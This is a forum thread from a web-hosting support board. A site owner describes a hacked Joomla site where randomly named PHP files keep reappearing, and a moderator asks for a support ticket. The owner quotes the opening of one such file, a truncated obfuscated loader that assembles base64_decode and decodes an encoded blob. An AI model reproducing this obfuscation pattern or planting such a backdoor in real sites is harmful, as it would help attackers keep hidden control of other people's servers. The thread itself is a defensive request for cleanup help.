Cleaning up hacked websites

Discussion in 'H-Sphere Reseller Hosting' started by Bunchadogs, Jul 20, 2016.

  1. Bunchadogs

    Bunchadogs Perch

    I have a website that was recently hacked - reported by Google/Norton/etc. and blacklisted everywhere - what a nightmare!

    We were able to get it MOSTLY cleaned up - enough that Google and the others 'scanned' it and reported as clean again.

    However - there is still a problem. Just about every day a few PHP files will appear in random locations.
    They have random file names and appear in random locations, (rarely the same) and the contents are encoded:

    <?php
    $eieahu = 4357; function tjyjq($nomeyctqc, $qtkqhm){$yqnpmwt = ''; for($i=0; $i < strlen($nomeyctqc); $i++){$yqnpmwt .= isset($qtkqhm[$nomeyctqc[$i]]) ? $qtkqhm[$nomeyctqc[$i]] : $nomeyctqc[$i];}
    $qhnnrpwfve="base" . "64_decode";return $qhnnrpwfve($yqnpmwt);}
    $mfhprk = 'NZ2CztXkKlNb5JtOxVXOlJn9KOxEcHgtsHwLowiTNZ2CztXkKlNb5'.
    'Jn9KdX2xM59xMqMFU8wTsEhU07LAV2GxJtiTUSfQlmGKlm2QPtizWXClP4L'.​

    I can find these files easily enough - but I can't identify WHERE they are coming from.

    The website is built on Joomla - we've updated to the lastest 3.5.x version, updated plugins, etc.

    At one point we changed EVERY user password (via PHPmyAdmin) and the FTP password and the MySQL password. We only updated the config file with the new SQL password - to keep the site running - but didn't login anywhere else. We didn't even update the FTP password in the config file. All of that was done via a clean and secure laptop, all via the Control Panel.

    The idea was to isolated any infected PCs and make sure the "leak" was coming from an outside user...

    No luck - the same evening multiple files showed up again. The laptop used to reset all the passwords was not connected to any network at the time, so I am 100% certain the source of the files is not an infected PC.

    I can NOT find these files in the Access Log, under the Control Panel.

    Interesting side note - we've blocked a LOT of IP addresses and ranges (via htaccess) and the day AFTER a file appears I can see a number of error message where a request was rejected for the same file I previously deleted. The rejection is based on our IP blocking.

    Any ideas how I can track down the SOURCE of these PHP files?

    I'm assuming it's a back door of some sort, but I have not had any luck tracking it down.

    We've deleted entire directory structures and replaced them with new installs - but that doesn't seem to help.

    I've scoured the logs via the Control Panel (Access and Error) and used some of the info to block IP addresses and even identify a few files. But the mystery files still appear almost every day.

    If I supply a file name and directory can Jodo identify WHERE that file came from?

    Anyone else have any ideas how to track down the source of the problem?
  2. Bunchadogs

    Bunchadogs Perch

    While I was typing the above, two files appeared:
    [​IMG]

    [​IMG]

    Although the dates show they were "modified" yesterday, they are new files that just appeared today (just a few minutes ago)

    Looking at the Access(Transfer) log in the control panel there I can activity at the time, and at least one suspicious "POST" - but nothing specific to those files.
  3. Manoj Saini

    Manoj Saini Super Moderator Staff Member

    Please raise a support ticket with domain name and files detail. We will check logs at server side and will update you back as soon as possible.

Share This Page

JodoHost - 26,000 hosting end-users in 100 countries
Plesk Web Hosting
VPS Hosting
H-Sphere Web Hosting
Other Services